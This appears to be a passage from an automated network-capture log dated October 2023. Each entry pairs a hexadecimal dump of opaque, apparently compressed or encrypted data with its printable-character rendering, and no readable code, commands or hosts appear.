                                                                                                    2023-10-24 04:55:22 UTC1692INData Raw: 65 ee bf 27 c8 10 3e f6 a0 56 1c 9c a7 5a ad 2f 91 3b cc 51 90 c4 c7 71 8e a6 1a ff 81 e7 34 7d 56 64 56 94 5a 64 1a a0 9a d6 ba 66 24 94 57 44 b4 b2 ac 32 4f 65 e0 f3 dc 79 86 1a 05 7e bc 27 66 10 0f 31 77 e1 21 56 9c 2a c9 08 53 0a 03 30 db 7e 6d cd a0 d5 2d 19 b4 ba f9 33 4e 7e 31 99 cb 93 d6 68 c0 3a f1 47 eb 44 44 b3 b0 06 71 06 cb 68 cb 74 98 c1 7c 43 11 28 67 87 b5 1f 7e 77 79 ba 92 64 1d f7 01 89 ce 88 a6 b9 7e aa e7 7c a8 c9 11 fc a8 22 8a 4c c5 98 e7 ae 1a 35 7b b9 e8 e4 63 a0 d9 d3 c0 da a9 20 39 e2 79 39 19 ca fa 38 ca c9 29 bc 9c f4 b6 ca 49 eb ac 66 7c 8a b9 4e 7d 57 c0 d2 b5 28 32 54 86 0a 6d 19 48 38 f4 e6 01 8f 45 5a 73 ce 8b e8 48 26 77 9e 81 0b 48 37 97 98 cb 2d 1a d9 60 a9 c7 de 85 2e 9c 24 55 f0 e3 93 44 da 5a d6 81 56 b3 c9 21 d1 20
                                                                                                    Data Ascii: e'>VZ/;Qq4}VdVZdf$WD2Oey~'f1w!V*S0~m-3N~1h:GDDqht|C(g~wyd~|"L5{c 9y98)If|N}W(2TmH8EZsH&wH7-`.$UDZV!
                                                                                                    2023-10-24 04:55:22 UTC1699INData Raw: e4 cb 8e 4a c7 31 e2 84 ac f0 fa 14 58 ac f5 eb 47 49 6a 43 b7 bf 3a 5a cd 00 de 58 bb 05 56 d4 17 5f 8e 16 bb bf ba e5 cc 00 02 38 3e 4a cd 74 c7 5f de 8f 7c e5 1c fc 01 5a 54 bf f6 7d f2 2e 6a f1 ae cd a0 c5 7f e7 2b a1 1f b0 f1 da bd c4 ff ac 63 0d 5c 09 55 41 ea 48 60 c5 06 19 a9 e9 f3 10 77 1f f5 20 a9 a4 a2 25 d5 32 30 f2 93 c8 2d 26 d5 1e e4 6c 25 67 ec af 64 31 7f 88 ed 3c df 8e 9f e7 fc c1 37 8a 48 95 13 ac a0 51 42 e9 e9 4a bb 5a 10 6a 52 af 23 c9 e1 6b 55 6c 95 b5 fe 87 bd 2f 63 1e f1 83 60 4d a9 ea fe ea 20 b5 24 c3 bd 19 46 55 41 ea 57 d8 fa c3 58 56 3c fb 77 b8 c2 da 21 66 68 67 ab 9f b2 88 e0 0d 52 3f 4f 2f 48 cf ce 6d 1f dd 79 ed d9 a3 19 15 da 31 6a 46 26 5e a2 6c bc 07 91 e5 f2 09 36 64 d9 9d 2e 00 bc 7b d0 a9 88 62 b0 2e 59 5b 12 56 d2
                                                                                                    Data Ascii: J1XGIjC:ZXV_8>Jt_|ZT}.j+c\UAH`w %20-&l%gd1<7HQBJZjR#kUl/c`M $FUAWXV<w!fhgR?O/Hmy1jF&^l6d.{b.Y[V
                                                                                                    2023-10-24 04:55:22 UTC1707INData Raw: de b8 e2 d9 16 3d da 39 bc f2 12 3b a2 02 56 23 19 33 f0 15 b5 b8 71 59 5a 8d 84 fc 11 6d 19 27 ae 1e db 1a f5 b5 d3 cb 60 e3 b0 75 5f c2 1b bb bc 30 22 31 02 ac 45 b7 c5 77 f8 f3 2d 19 ff 06 79 eb b2 65 c6 55 89 a7 e9 8b 8e 98 b1 7b 10 4b f5 ee 03 4b b3 f1 d8 ec 2c ff 86 bf 0b 68 51 e3 86 09 9c 21 ac 9f ef 17 1e 47 0f ee 2c f6 f5 b7 48 44 cc 3a fa 45 67 5d 5e ec 9d 28 91 09 79 7c fa 65 4e 6b e6 27 b8 2a 92 47 60 cc e6 1f e9 1f 5c 05 09 d2 18 b5 fd 3d e7 94 6a b0 c5 77 b4 25 7d 07 ef ae 76 ef bb 22 80 b5 f5 ef 3d 0f 3f 0c ba 67 1c 7c b7 fa 21 90 11 2d eb de 44 af 50 f2 3d 20 a5 da 7a 12 d0 f3 19 79 a3 ef 87 0d 8c f8 64 c2 6d ca 2e 56 b9 aa 62 20 56 59 f5 80 43 ac b2 d7 16 ab 9c aa 3b 2d e8 2b 56 da c5 2a 9d 1e 42 4c f3 09 6f c7 cf d1 01 87 c5 1c dc 83 fb
                                                                                                    Data Ascii: =9;V#3qYZm'`u_0"1Ew-yeU{KK,hQ!G,HD:Eg]^(y|eNk'*G`\=jw%}v"=?g|!-DP= zydm.Vb VYC;-+V*BLo
                                                                                                    2023-10-24 04:55:22 UTC1715INData Raw: df fe 98 3e 4b 76 a7 99 ed ea 05 82 e5 5e b2 94 97 ca c1 f0 1c 10 23 96 6d c0 59 9c d5 95 ce 85 9e ea 98 12 7b f6 b4 cb 8a 34 ef 54 40 38 d7 62 0f 25 6d bc b6 01 6c e3 f2 c5 02 a1 11 45 fd 32 75 7f 72 2f c4 29 ab 2f a1 38 25 f4 61 e2 77 a0 13 35 21 0e d0 a3 1d c5 59 49 f7 f8 11 70 1e 2f 2e b5 66 64 b3 f4 81 49 d6 58 71 fb 49 fa 83 33 cd 3d 1c f3 53 ad 7a 38 78 c6 1e 0e c9 c2 56 a6 fe d0 1c 8b 1e 8e ca 74 b0 65 0f 89 be d4 e5 0b e1 0c ba 53 1d c3 20 8a 69 9d 05 51 8c b1 5a df e8 f5 df c4 46 55 35 b9 12 9d 75 98 79 bd c2 0b 79 5f e4 95 a1 60 e3 25 1b c2 53 4d 0c 5c 20 6b 0f 4f 30 98 95 ec 22 d1 ac a7 76 13 20 76 59 8a 11 e7 80 88 42 ba 73 50 aa 36 c6 1d b3 d5 3a fa 03 bf 8f a9 9e 22 4e 81 1c 8f 2f 7d ec 42 d0 20 5e 73 a1 9e 62 81 a4 34 f3 da 23 e9 44 2b 10
                                                                                                    Data Ascii: >Kv^#mY{4T@8b%mlE2ur/)/8%aw5!YIp/.fdIXqI3=Sz8xVteS iQZFU5uyy_`%SM\ kO0"v vYBsP6:"N/}B ^sb4#D+
                                                                                                    2023-10-24 04:55:22 UTC1723INData Raw: a7 4c 72 02 ae b3 70 27 d5 8e 21 b5 6b 7d 21 db 7d 77 10 91 ed 1e a9 36 55 65 a0 77 9d 4b 77 f9 b6 9d ad 4c 7f aa 8d e1 e9 c8 3e 48 e7 44 4c ad cd 72 eb 3f 30 08 fa 9d b9 9b f7 ce 9a 30 b8 0a 78 4d 33 a6 36 01 97 0f f2 77 f9 5c 16 bb ca a5 f8 bd 5b 51 ef b3 15 21 73 ea e7 d5 22 1f 7d 9d 77 1b fb 66 f8 6c f4 45 86 5e c8 e3 f2 9a 23 c7 7a 32 b6 cf de 18 ad 01 34 46 07 74 1e 2c fe 05 7a d2 3b 95 a1 73 09 16 b7 9c e1 e8 9c 47 2c c8 91 05 7d b2 7d b8 3a 7c 7e 4a 6d 74 d0 19 b4 95 65 04 72 39 e8 2d b4 82 5b b4 24 ed 23 96 2c 6c 96 cd 29 f4 66 6e 84 bc c3 ab 71 2b 19 be 7f c9 2c fd 08 af 4e de ed a8 79 f0 3e 6c e2 79 3b 17 6e 09 57 40 c5 ae 0b 30 d6 ad c7 01 ad d9 bd 2f 3a 88 c0 ba 78 be d3 cb 90 85 cc d9 50 35 7f fa ce 77 e4 c1 b3 13 95 e1 f3 2f a2 95 96 12 55
                                                                                                    Data Ascii: Lrp'!k}!}w6UewKwL>HDLr?00xM36w\[Q!s"}wflE^#z24Ft,z;sG,}}:|~Jmter9-[$#,l)fnq+,Ny>ly;nW@0/:xP5w/U
                                                                                                    2023-10-24 04:55:22 UTC1731INData Raw: f9 28 fc 4f dc a9 df c9 77 ff d4 0b 78 b6 a7 9a 2b 08 b7 1b 41 8f 70 4a a1 f4 01 4e b3 d5 f3 2a 7b 2b 71 c6 9a 51 25 3c 1f d5 97 03 99 b5 18 6b 2b 69 0b c4 20 ed e9 5b 8d da e6 50 7b 91 77 cf c8 87 37 09 9d 92 2d ea bf 95 62 4f 90 1a 72 87 bb ba bb df 21 6b 88 96 b8 a1 7c 4b e5 70 23 6b 8f 40 c5 14 5a a2 31 42 69 ca e3 0f 44 f5 03 5d 51 53 e5 6f 51 2e 7a bd 6c 54 ff 3e 26 83 0c 60 b4 03 3e bb ba 09 05 e4 4b ea e9 97 01 9d 40 33 54 4d a0 69 b8 de bf 32 c8 e0 ce 37 2e 04 3b 2f d7 69 89 dc c1 fd fe d0 8d be 9b fb e7 58 cd 60 93 6c 72 b9 49 54 ce b2 b3 55 c3 4a 84 1a 2f b1 6d 29 5d 39 ed 4a ea 80 6e 56 05 2b 75 ee a8 23 76 b4 c8 5b 6c 50 61 b5 b7 ae f8 b1 ec fe 08 d1 73 2b 46 88 98 18 21 da 7e b6 3f 42 f4 01 c7 98 c6 c0 5a 07 9d dd 2b 1f 60 85 76 af 01 2f 3b
                                                                                                    Data Ascii: (Owx+ApJN*{+qQ%<k+i [P{w7-bOr!k|Kp#k@Z1BiD]QSoQ.zlT>&`>K@3TMi27.;/iX`lrITUJ/m)]9JnV+u#v[lPas+F!~?BZ+`v/;
                                                                                                    2023-10-24 04:55:22 UTC1738INData Raw: 11 23 5a 89 7c 28 ce 2b d1 69 39 6c aa 0a 07 e9 9c 4f 68 d8 9b ab 24 09 2e af cf fd d5 34 46 c7 7d a7 86 3f e7 7c d1 c6 56 b4 35 16 5f 2b 8d 04 aa 5d 2f 32 0c 2f 2a 0d 32 0a ce a0 c7 ba 10 6c 1c d5 52 b2 ba 61 76 fd ba 0d 2d 07 0e 7e 0c eb a3 df f9 a9 0b c5 dc 80 c0 fa fb 79 95 64 c3 bc ac 12 ae fb 0c 94 d8 ab 7d 4a 46 e4 e7 5b 0a 64 f9 cc 2f 47 bc e0 6a da 40 b7 a9 e1 1b e2 58 1e 51 40 0b a3 59 b1 81 31 e4 b0 04 cd 2a 51 f1 15 55 07 0f ac b6 be 5c 03 bc 75 54 13 66 d8 2b c1 4a cb e3 bd 67 cd b9 06 9c 2b 02 38 1c e0 bd 65 b3 40 71 cb 9e 1b 46 74 2e bd 58 31 0a b4 34 5e 47 83 bf d4 18 2c 5a 17 be ef 09 07 8e 86 29 a3 da b8 d1 f1 93 4a 2e ac 48 99 52 39 1d fa 36 9a d7 09 6d 69 dc f3 4f 25 b2 eb d6 94 d1 d2 f3 d1 71 92 92 11 70 2e d2 f6 f3 c3 25 86 2c b2 af
                                                                                                    Data Ascii: #Z|(+i9lOh$.4F}?|V5_+]/2/*2lRav-~yd}JF[d/Gj@XQ@Y1*QU\uTf+Jg+8e@qFt.X14^G,Z)J.HR96miO%qp.%,
                                                                                                    2023-10-24 04:55:22 UTC1746INData Raw: fd 24 06 89 a5 d0 47 f7 98 ad 5f cb d7 76 8a 98 9b b0 82 d9 7e 5f b2 2a bd 6f 3c ec 3b 01 fb ae ee 1b cf 74 a2 8b d6 4b 58 60 c2 9a 93 78 d2 19 5a 32 de b4 76 48 5a 2b 57 a1 8d 34 a4 79 ab 5a 04 da 5e 96 2e 8d d0 74 08 19 21 a0 79 18 d2 fc 55 2d 33 2c 91 b1 86 b8 61 4d 01 c1 e6 60 7b f6 10 cc be 2b 14 52 17 b9 ca bd 5e 44 ed 46 d4 64 8a a7 2a 79 98 f7 a0 1a 67 b8 6c d1 ed 07 bc 02 19 90 99 99 ef 36 63 98 2b 46 c4 4c 77 b5 dd c1 92 e1 2e 13 8c 57 0c a1 c9 fa a6 2e e0 16 bc 7d 91 16 43 27 9c 95 5e 94 68 a6 cf 0f 76 6e ca 00 e6 30 45 2b 8b 77 b5 d0 7e 06 46 74 dc b0 50 9d ba 9f 3e de d0 08 30 87 a5 66 a2 f9 9e 13 3b 55 cf 24 b9 b9 eb 18 ed 1e cf 30 46 60 bd 40 f5 90 84 a7 bb c8 72 df 3c 76 4d dd 99 66 e0 43 82 ba 91 76 63 13 50 0f 9c 9a cd 74 0e e0 61 90 24
                                                                                                    Data Ascii: $G_v~_*o<;tKX`xZ2vHZ+W4yZ^.t!yU-3,aM`{+R^DFd*ygl6c+FLw.W.}C'^hvn0E+w~FtP>0f;U$0F`@r<vMfCvcPta$
                                                                                                    2023-10-24 04:55:22 UTC1754INData Raw: 53 8d 6d e7 99 9a 18 9e a9 c9 b5 be 75 f1 c0 b6 5a 49 f6 32 55 1d c1 ec 66 11 71 c5 df 39 5d eb 7d 30 32 f4 78 07 9d 4c 93 78 b3 b9 cd 13 f5 17 31 db 47 30 c2 70 25 8c b5 a3 d1 ce be c4 1d 35 f9 3f ef 3f a8 4e 27 fb b6 6c d9 b4 71 13 de 7f c6 8c 18 05 92 e3 05 48 96 14 ef e5 58 73 42 f2 40 62 ba 88 c0 f2 3f 1b b9 a9 17 e6 45 7f 86 ed c9 60 16 6b 06 20 d7 4f 33 69 56 69 65 f5 25 f9 04 8a 3d d3 9c 33 7e e9 3d d3 97 1d d8 ee e1 e9 d3 1e 69 0e 46 72 5b 27 29 db 82 98 0d 01 96 ca f0 cb 8c 6d d4 2e 91 41 85 56 69 38 b2 20 83 80 2f bc 5e 68 2e 0c 8b eb d7 31 54 1d d1 ec 66 d9 25 b9 bb 14 fc 3e 14 8b 56 e4 8a 33 46 9e 5e 35 9d 06 08 2f f6 fd b8 36 f4 dd 44 32 d2 5c 38 55 77 9e 86 9e 6b 28 14 58 8b a7 77 9e 62 20 54 6a 2a 0e b4 a7 c4 70 93 b8 08 40 c9 43 c6 a6 06
                                                                                                    Data Ascii: SmuZI2Ufq9]}02xLx1G0p%5??N'lqHXsB@b?E`k O3iVie%=3~=iFr[')m.AVi8 /^h.1Tf%>V3F^5/6D2\8Uwk(Xwb Tj*p@C
                                                                                                    2023-10-24 04:55:22 UTC1762INData Raw: 8c 6e 5a a3 1b 0b 7e b3 86 45 9a d1 cf 27 a2 b7 9c e1 36 5f 73 81 37 84 ac 59 0f 49 7d b4 7e cc fc 9a 20 95 c7 b2 c6 20 ed 98 3f 4b e8 8c 7a 9e bb c4 13 d6 8d bd 03 d6 8d 39 f4 da ba 79 ec f8 2f d6 8d 86 d7 8d f3 72 dd 98 98 13 d5 1f d7 ec f1 7f be 6e 0c 36 5e 37 f8 f5 f5 75 a3 e3 75 e3 8e ac 9b 86 1d 1a 4b a3 77 c6 36 a4 e8 46 4b 5b e3 ba dc 23 1b e2 34 a3 81 f9 b0 6e b1 ca eb 69 34 8f 5f 33 d3 65 b2 6a 80 83 57 50 5c 1b a3 1d 35 b7 25 46 e9 b6 a4 5e a6 1e f5 49 18 c2 52 70 3e 96 be c3 e3 a7 0d cf 7c 84 e6 be 72 72 72 79 55 0d 48 f9 49 ef 62 5c 92 86 75 d9 ee 83 34 e8 8d da b8 db 7e 0e 8d 05 a2 64 d0 bd 9d 38 3c 01 f7 ff 18 87 94 37 95 65 61 18 fd 82 6d 9a d4 f8 a0 d1 cf 89 37 ee da 54 cf bc e5 e4 31 99 f8 1c d8 8d 05 d4 af b8 67 fb d3 d4 ef 87 84 1e 29
                                                                                                    Data Ascii: nZ~E'6_s7YI}~ ?Kz9y/rn6^7uuKw6FK[#4ni4_3ejWP\5%F^IRp>|rrryUHIb\u4~d8<7eam7T1g)
                                                                                                    2023-10-24 04:55:22 UTC1770INData Raw: 31 dc 73 86 76 6f 2e 85 e3 f9 0f 91 70 5f 22 0e fc 59 1f 07 fe 18 71 e0 2f 10 07 fe 82 f1 42 24 dc 47 7e 08 fb 01 ef 0e 8c 84 fb 0a 83 27 df ff a2 d9 23 e1 9a 4f 8f 68 f1 e0 54 8f 31 38 57 29 fd fb e8 b9 27 7a 25 7a 36 f2 af f5 70 cc 0c 68 63 2b 39 83 3c c7 eb 48 48 bb bd b8 48 d9 7c 0a df 6e 47 6d 6c 7a 01 b5 f1 09 da 97 ff a4 f7 a2 36 de 47 6b b9 0f c9 85 8f b1 7e 68 70 cf e0 e6 af df a3 a4 06 bc 8b b2 b6 3f 5f fe db 43 81 67 8c 75 df a7 30 3b 60 eb 87 0c ca c3 72 53 73 c6 4b 3b 84 57 1b d8 ec 5a 53 15 d8 72 7e 23 8a cc 61 21 0f c6 8e 99 03 d6 23 0b ae c7 57 ec 41 eb f1 21 6b c0 7a 24 cc f9 cb f5 78 07 ad c7 de be f5 d8 83 d6 63 1f 5a 8f 7d 2f ae c7 6e 6a 3d f6 0d 5a 8f 77 d1 7a bc d5 b3 1e 8d b4 26 40 ed 35 a3 fb 22 13 11 df 38 36 7b 00 df 58 0d f9 86
                                                                                                    Data Ascii: 1svo.p_"Yq/B$G~'#OhT18W)'z%z6phc+9<HHH|nGmlz6Gk~hp?_Cgu0;`rSsK;WZSr~#a!#WA!kz$xcZ}/nj=Zwz&@5"86{X
                                                                                                    2023-10-24 04:55:22 UTC1777INData Raw: ac 2c 5b da c6 14 43 e4 e8 f4 7c e7 55 01 fd 2b 66 ce a4 2a 66 ce 6c 8f 2b 98 91 38 7e 85 5f 43 48 1b 7b 71 e4 c4 6a 89 b6 71 12 a7 92 6f c8 c5 97 e7 4c 1b 10 77 22 d2 34 00 b2 73 2f 4a 5e 5c b7 4a b9 be 75 d7 38 a2 7e c6 92 fa d5 aa 09 d6 f8 4b 7b e2 42 52 d3 cd c9 eb b2 db e2 83 52 72 1c 5c fd fb 2a 5c de 74 9f 8f 6a 6c ba cc b0 a6 6e 98 13 17 b2 d4 bb 76 94 45 b0 32 7e bc 52 a4 d9 11 ca ae 95 b6 65 31 96 64 4e 1e 58 e9 ef 43 6d c3 91 11 f2 49 40 2f 39 4f a7 ce a8 9a a2 0d f5 97 19 aa 29 ae ec 84 f0 86 c3 22 f5 d7 60 4e 81 dc 67 19 12 a6 4a 7e f6 27 c2 33 3d 95 cf 1c df 06 23 4d 8c 50 fc 22 d6 58 c1 d5 e2 2e 1d 7b 69 cc f0 1a 0f d7 16 94 7b ec 2e 2e d3 27 c2 dc 63 99 f9 04 d0 41 bc 84 2d 85 18 dc 47 97 48 a1 7a 2f 44 fe 4c 48 f4 a4 47 2f ad 3a 8a fc f2
                                                                                                    Data Ascii: ,[C|U+f*fl+8~_CH{qjqoLw"4s/J^\Ju8~K{BRRr\*\tjlnvE2~Re1dNXCmI@/9O)"`NgJ~'3=#MP"X.{i{..'cA-GHz/DLHG/:
                                                                                                    2023-10-24 04:55:22 UTC1785INData Raw: 8d bc 74 e0 cb d9 03 bf 5c 7c 40 1c 07 be 9c 9f 5b 57 5b 58 52 08 f7 1b ec 99 c9 20 92 8b 2b 4a eb e0 7a 24 61 05 63 15 84 2c ad ac 78 7b 55 cc 66 55 5d 43 f9 a6 1e 6a 62 0e a4 26 fe 91 c0 14 60 09 93 99 55 aa 12 45 49 9d 7d 4f 93 84 20 7e 6b c9 f6 2a 36 b8 da 48 5b 1b 58 86 89 73 54 95 e5 95 11 eb 2b aa 6a aa b6 53 74 20 c2 39 03 e9 80 3c 24 49 c0 d9 6c 61 7e 65 c5 b6 b2 6d 55 80 bf 7c 04 d6 17 c7 38 a9 a5 8a f2 1e 2e 25 22 59 c9 5b 0a 55 5b 6b 48 40 89 11 8c 40 5e 05 4b 94 54 5c 49 ed 64 0e 92 2e 5c 8c 18 48 11 b4 77 c0 5a b2 58 bc 14 d5 86 4d 35 38 16 09 a5 06 ac 6f 04 e7 39 8a 9c 43 94 32 25 f1 db 6a 93 6a 4b 94 e5 49 85 15 45 b5 a5 60 2f 40 fe 27 60 73 c4 f9 40 42 f4 ee 05 34 02 92 c4 63 81 a4 ab 87 34 b9 8c fe 2f 4e 39 2e 4b 2c aa 47 6b 94 be bd a8
                                                                                                    Data Ascii: t\|@[W[XR +Jz$ac,x{UfU]Cjb&`UEI}O ~k*6H[XsT+jSt 9<$Ila~emU|8.%"Y[U[kH@@^KT\Id.\HwZXM58o9C2%jjKIE`/@'`s@B4c4/N9.K,Gk
                                                                                                    2023-10-24 04:55:22 UTC1793INData Raw: 10 5f b1 f5 de ee f0 af d0 2f d5 53 d5 cb a6 d3 61 35 6a 23 fb 9b c5 9c 8d 6b b0 2f 55 d0 97 03 57 c7 34 3d 26 f7 e4 7e a7 65 8e 02 9e ec 56 46 df 57 85 0d 30 f2 ac 71 9f f3 81 3a fc 77 9d bb 78 c3 2a 1a 9e ac 69 ae 31 6b e7 28 47 e2 ae 4c 53 f4 eb 01 c1 48 d4 51 0b da e1 5b 55 a0 b7 b6 87 39 e3 39 85 f4 df 9b 6c 44 fa dc fe 83 9f 93 48 df 82 44 fa 76 80 f4 8f d0 4d 90 fe 9c 71 a4 ed a7 47 fa 87 bf 45 a4 3f 43 4a 22 fd f4 51 72 e0 5d 67 41 62 80 28 ba 0b 69 7f 63 94 50 a4 ba f4 c1 34 ec df b9 d1 d0 bf 36 cd 06 a4 15 eb 14 52 2d e5 be 2e 6a 80 5c 79 9a 08 1a b3 c0 1c f4 6a 1f 5e 2d 84 2b 61 df c1 fd bf 4a 0e 88 15 21 bd 6b c2 5f d5 fa a2 3f f6 84 35 ea 2d df ba 34 0e 8f 6f f6 cb 20 cc 02 0b 77 d7 29 da 9f c5 f0 2c 5d 2f 2b fc 39 97 b4 1b b9 53 8c 76 a3 c5
                                                                                                    Data Ascii: _/Sa5j#k/UW4=&~eVFW0q:wx*i1k(GLSHQ[U99lDHDvMqGE?CJ"Qr]gAb(icP46R-.j\yj^-+aJ!k_?5-4o w),]/+9Sv
                                                                                                    2023-10-24 04:55:22 UTC1801INData Raw: f2 27 83 57 46 0a 88 66 92 eb 5e c4 53 d2 87 16 62 90 3e b9 7c ea cc d3 01 32 6b d5 cc 81 30 c1 25 36 41 94 0f be 3e 1e 25 cd f6 10 aa c6 e0 53 8c 79 1f 83 7b f9 03 76 25 26 da 60 6d a4 5e 1b 90 7d 39 bc 15 b5 81 bd d6 0f f7 d9 07 3f 2a 45 8f 35 d1 bf 78 3d 8e 77 52 04 8c b7 73 8b 89 2f ed e0 ed 5f 53 37 2d e8 93 6f e6 a8 b6 b1 35 09 cf 31 27 09 ec 41 3d 26 ac d8 49 f9 fa c6 44 18 7d a0 bf 79 9f 8f ef 87 b1 cd 18 1a 9b 40 3f b6 9b a1 ff 65 6c d3 4c c7 d6 19 4c 8d ed c7 38 1c db c1 60 6a 6c 12 e3 d8 a6 98 8e cd 2f ca 74 6c d7 b6 98 8e ed 5c 09 35 b6 94 68 1c 9b 7f f8 d0 d8 6e bb 70 0c b9 f0 c6 2c ab c3 21 43 fa ed ea 40 ff 8c 4e 41 c3 4d 47 3c 9d e6 83 77 43 2f 4c 41 fc d7 3e 03 eb 3d 14 28 ae 6c c5 dc eb 84 4d 98 43 64 83 3d 5d ba b5 97 1d 59 fe 54 7d 47
                                                                                                    Data Ascii: 'WFf^Sb>|2k0%6A>%Sy{v%&`m^}9?*E5x=wRs/_S7-o51'A=&ID}y@?elLL8`jl/tl\5hnp,!C@NAMG<wC/LA>=(lMCd=]YT}G
                                                                                                    2023-10-24 04:55:22 UTC1809INData Raw: 2a 8e af ad 56 d5 d7 c5 52 d8 7e 15 ca 93 c5 f7 33 a2 1c ce 44 b4 1e 65 30 e3 be aa 51 02 bd 05 55 2b 51 fe 53 b2 c9 a0 05 9a c6 b7 6a 55 3c 8a 14 1c 55 c9 31 1e 4e 79 1b 51 ee 4f 5e b0 5e 4d f0 29 ec 05 0d dd 4b 99 99 ee 65 89 81 ee 65 93 96 ee e5 b4 8a ee c5 d7 88 7a 41 b1 83 bf 99 b4 3d b4 8a d6 be c2 a8 c4 27 9a b5 94 5d cb c8 b7 8b 8d 52 36 a2 9e c6 4f b2 29 3d d0 ea 4a 90 65 1b 40 6e f5 03 79 b4 6d 59 12 a5 96 65 60 3b 81 56 bf 82 77 eb 80 56 b7 83 2c ab 6a 90 63 d6 c7 b2 89 52 53 1a 7b f7 b8 4c 3c 07 64 d4 00 65 06 56 0e 74 39 0d 68 75 2a b4 7d 6b 75 1e b5 d3 9c 81 8d 59 93 43 a8 81 56 85 40 d3 13 9b f3 28 6f 13 58 09 ab 72 3c 1c 04 b4 25 d9 8f 0b 58 d3 01 be d0 b4 24 bd 81 a1 4b 90 1f ef c9 65 9c d7 01 be e8 8c b4 c5 55 12 71 bc 46 9b d6 28 95 22
                                                                                                    Data Ascii: *VR~3De0QU+QSjU<U1NyQO^^M)KeezA=']R6O)=Je@nymYe`;VwV,jcRS{L<deVt9hu*}kuYCV@(oXr<%X$KeUqF("
                                                                                                    2023-10-24 04:55:22 UTC1817INData Raw: 4a 72 18 6f 4f 64 1f 6f cf 99 4f 15 5c 54 df 20 44 98 59 29 a7 6d bf 30 56 ff cf 14 dc 44 de 50 62 ea a7 32 4e 3a e0 81 e4 1b 74 cf 15 e7 be f3 b5 86 2c 60 b1 d8 87 bf 54 f1 b2 49 01 eb d1 2f 98 ff 16 7d 86 fe a3 78 02 32 34 2f 4e a2 57 ca e7 12 eb 6f 48 d9 82 fc 1a bd 6c 19 ed dd ef d6 90 31 fe 1b 5f f5 d6 90 03 19 5d 2f 47 d2 b0 40 b1 a2 1a c9 ad 99 3c e2 86 8e 45 cc 07 9b b3 5e d3 2d b1 c9 50 64 45 df 97 d8 eb be 54 82 c4 0e 29 95 69 d5 88 b7 53 e4 6c d6 4b 97 14 dc a0 64 43 bd 44 2d bc ef 21 40 ff dd f7 10 20 9e 08 1a 4f cf ad da a7 b1 b8 6b 60 a9 a7 57 ab b5 1a 55 e3 fd 3b 4e c8 93 d0 eb 8e 53 39 e7 ed 6b 2a 5e 74 b7 ec 29 36 19 a5 8b 91 a7 08 38 61 14 c5 7d 60 8c 7b f1 d9 80 07 64 81 5e 57 2b d6 20 7e f5 19 e2 57 e1 3d f8 e2 91 ec c1 a0 19 29 8d b4
                                                                                                    Data Ascii: JroOdoO\T DY)m0VDPb2N:t,`TI/}x24/NWoHl1_]/G@<E^-PdET)iSlKdCD-!@ Ok`WU;NS9k*^t)68a}`{d^W+ ~W=)
                                                                                                    2023-10-24 04:55:22 UTC1824INData Raw: cf 1e b8 88 fc 57 74 fe d3 d5 ed 83 8b cb 5c 05 83 5a 40 cf b9 e5 32 87 2d b2 64 0c b1 d3 bc b8 6a 28 8b 6d 49 1e b6 7a 65 20 a5 2e 5f c5 26 96 95 bb 53 11 ad ee a5 b3 41 8c 43 2b 9e 38 0a 74 f9 10 1a 73 9c 37 5f be 9a 6b 8b 1b 3d f5 8c cf e4 93 d7 48 78 f2 d2 1e 81 b5 1a dc 67 ad 0a c6 b4 5c 35 05 5b ef e1 b6 68 c7 f7 68 85 2c 57 ee cd 6b bd 8c 83 a5 3e 70 51 99 bd ab db 3e 2f 2e 41 12 a2 cf aa e5 3f d2 7c c5 28 b0 f4 e7 5a a3 9c 45 04 01 7a d3 36 50 e7 1c 49 7c c0 c4 5c ea de 53 6f 31 54 a1 99 e0 4c 1c e5 3b e2 18 c8 d5 f3 7d e0 3b db da e1 ce c5 ef 5d 74 a1 ff 1e 63 69 5e b1 2f 19 65 e1 c1 57 7f 9e 7d 3e c2 a1 d3 fb 60 46 17 9d c9 8f da 4e 02 0e 79 91 4e d0 aa dc 87 41 3f 20 6e 26 f9 6d 5e 07 fa 24 d2 87 e2 38 64 20 5d 97 e2 7e 9d 01 eb 47 b0 83 37 6c
                                                                                                    Data Ascii: Wt\Z@2-dj(mIze ._&SAC+8ts7_k=Hxg\5[hh,Wk>pQ>/.A?|(ZEz6PI|\So1TL;};]tci^/eW}>`FNyNA? n&m^$8d ]~G7l
                                                                                                    2023-10-24 04:55:22 UTC1832INData Raw: 2b 90 af 2a 06 c7 8b 31 1a 97 c7 32 c6 b2 27 a5 66 92 37 8d fb 4d 58 5c 91 1e 41 c3 f2 7d ea 95 8a 4e b0 f7 ed d4 ab af 42 6a b0 ee b2 5f 69 ca 90 cd 1f 07 56 bc de b6 25 6f 5c 27 36 ea ab d0 12 a8 99 fd 55 06 f8 ae 62 2b 5d b3 03 39 33 37 9b 05 46 ca c0 76 f2 cf 66 82 3d 3d 43 73 dc 27 e0 46 ce cc 05 8a d9 31 fa ad e3 da f1 d8 4a 8f af 82 72 8e 54 b7 4b 00 b4 59 f0 3f bf 6b af 26 ec 98 ee 7d cc 2d 3c 74 3b 53 b7 0b 5d 9b 39 e5 c4 0f 3b a1 f7 ff 36 ce d4 8f e5 00 16 7b 19 2d cc 09 d0 5b 40 fe 8f 98 96 cb ee 03 63 c1 77 73 54 d9 ef 9f 0b fb d4 73 15 7d 4c 55 36 eb 4f cf f8 f5 41 63 67 c5 1e e5 6c 59 0f ae df 0d 64 dd f4 31 de 80 14 82 16 7a e2 c3 5c 76 3f 7b 87 17 be db 05 5a b1 73 a7 57 7e f3 be 4e 0c 68 9a ad 8a 41 00 8a 34 8d 2a 92 1c 15 e0 a6 de 80 1b
                                                                                                    Data Ascii: +*12'f7MX\A}NBj_iV%o\'6Ub+]937Fvf==Cs'F1JrTKY?k&}-<t;S]9;6{-[@cwsTs}LU6OAcglYd1z\v?{ZsW~NhA4*
